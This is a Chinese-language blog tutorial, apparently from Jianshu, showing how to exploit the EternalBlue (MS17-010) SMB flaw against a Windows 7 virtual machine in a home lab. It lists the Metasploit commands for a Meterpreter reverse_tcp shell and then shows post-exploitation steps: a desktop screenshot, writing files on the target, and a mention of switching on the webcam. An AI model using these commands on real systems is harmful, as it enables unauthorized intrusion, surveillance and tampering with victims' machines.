【EternalBlue】利用永恒之藍漏洞滲透攻擊教程

當初被永恒之藍吸引,是因為覺得這個名字還取得挺好聽的,有點神秘還有點浪漫色彩。關(guān)于永恒之藍的原理就不多解釋了哈,在這里主要演示一下如何利用永恒之藍進行滲透。

演示環(huán)境

虛擬機軟件:
名稱:VMware? Workstation 15 Pro
版本號:15.1.0 build-13591040
下載地址:https://my.vmware.com/cn/web/vmware/downloads/info/slug/desktop_end_user_computing/vmware_workstation_pro/16_0
攻擊機:
名稱:Kali
版本號:kali-linux-2020.3-installer-amd64
下載地址:https://mirrors.aliyun.com/kali-images/kali-2020.3/
靶機:
名稱:Win7
版本號:cn_windows_7_enterprise_x64_dvd_x15-70741
密鑰:網(wǎng)絡上隨便一搜就有
下載地址:https://msdn.itellyou.cn/

實驗準備

靶機Win7

一、關(guān)閉防火墻

image.png

使用netsh firewall show state命令
檢查防火墻是否正確關(guān)閉
(操作模式為禁用)
image.png

二、獲取Win7的IP地址
使用ipconfig命令獲取IP地址
所以靶機的IP地址為:192.168.204.140

image.png

攻擊機Kali
一、獲取kali的IP地址(可省略)
為了能使用ifconfig命令,這里要先切換到root哦,切換命令sudo su。
使用ifconfig命令查詢Kali的IP地址。
所以攻擊機的IP地址為:192.168.204.141

image.png

二、測試攻擊機和靶機之間的連通性
這里讓Kali使用ping命令
ping 192.168.204.140
(如果ping執(zhí)行的時候卡住了,關(guān)掉窗口重來一次)

image.png

三、使用nmap掃描靶機
使用命令nmap 192.168.204.140
可以看到445端口是開放的

image.png

漏洞滲透

一、啟動msf
使用命令msfconsole
出現(xiàn)的圖案可能不一樣

image.png

二、搜索eternalblue
使用命令search eternalblue

image.png

三、選擇eternalblue
這里我們選擇第二個
使用命令**use exploit/windows/smb/ms17_010_eternalblue
注意命令手打的時候別打錯了啊

image.png

四、配置信息
1、先用show options命令熟悉一下
會顯示一些詳細信息
Required的yes表示必須有值
這里看到LHOST(攻擊機)和LPORT(監(jiān)聽端口)都是有值的,此處要保證監(jiān)聽端口(4444端口)是不被占用的狀態(tài)哦,或者也可以自行設置。

image.png

2、設置攻擊目標RHOSTS
使用命令set rhost 192.168.204.140
image.png

3、設置攻擊載荷payload
可以先使用show payloads命令查看有哪些payloads
image.png

使用命令set payload windows/x64/meterpreter/reverse_tcp
image.png

五、開始滲透吧!
使用run或者exploit命令滲透攻擊。
最下面顯示W(wǎng)IN表示滲透成功
如果顯示FAIL,可以重新再試試

image.png

功能測試

到這一步,我們就滲透成功啦,也就是獲取到了靶機的管理員權(quán)限。
接下來進行一些操作證實這一點。
一、獲取IP地址
使用命令ipconfig
可以看到確實是靶機Win7的IP地址。

image.png

二、截取靶機桌面
1、使用命令screenshot

image.png

2、查看保存到的截圖
出了點小小的意外,由于我是以普通用戶的身份進來的,所以沒有權(quán)限查看/root里面的文件內(nèi)容。
接下來的操作是將截圖移動到/home/northwest/下面,方便我這個沒有root權(quán)限的普通用戶查看。
使用命令mv fUKNpRUJ.jpeg /home/northwest/
image.png

這樣圖片就到了/home/northwest/下面
image.png

正是從Win7捕獲到的屏幕截圖
image.png

二、寫文件到靶機
這里使用命令:
cd C:\Users\Lenovo\Desktop
mkdir eternalblue
edit I_am_kali.txt
這樣就在Win7的桌面創(chuàng)建了一個名為eternalblue的文件夾和一個名為I_am_kali的txt文件。
(并且在txt里寫下了一些內(nèi)容,按i進入插入模式,寫完后,先按Esc,再按:wq退出并保存)

image.png

可以在Win7看到該文件夾和文件
image.png

這里僅僅進行幾個簡單的操作來驗證,總而言之,我們獲取到了靶機Win7的管理員權(quán)限,可以對它為所欲為。(說起來我當初開了攝像頭,然后就看到了一個頭發(fā)凌亂,穿著小熊睡衣,懷里還抱著一袋山藥脆片的我......當時差點就被寄幾丑到去世。)

原理沒有講解,步驟寫得也有點啰嗦。
有什么問題歡迎大家一起討論哦。
謝謝您的瀏覽!90度鞠躬!

最后編輯于
?著作權(quán)歸作者所有,轉(zhuǎn)載或內(nèi)容合作請聯(lián)系作者
【社區(qū)內(nèi)容提示】社區(qū)部分內(nèi)容疑似由AI輔助生成,瀏覽時請結(jié)合常識與多方信息審慎甄別。
平臺聲明:文章內(nèi)容(如有圖片或視頻亦包括在內(nèi))由作者上傳并發(fā)布,文章內(nèi)容僅代表作者本人觀點,簡書系信息發(fā)布平臺,僅提供信息存儲服務。

友情鏈接更多精彩內(nèi)容